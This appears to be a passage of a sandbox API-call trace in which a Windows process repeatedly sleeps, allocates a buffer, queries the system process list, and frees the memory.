NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.202] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.212] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.221] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.241] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.260] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.271] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.281] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.290] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.298] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.311] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.341] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.392] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, 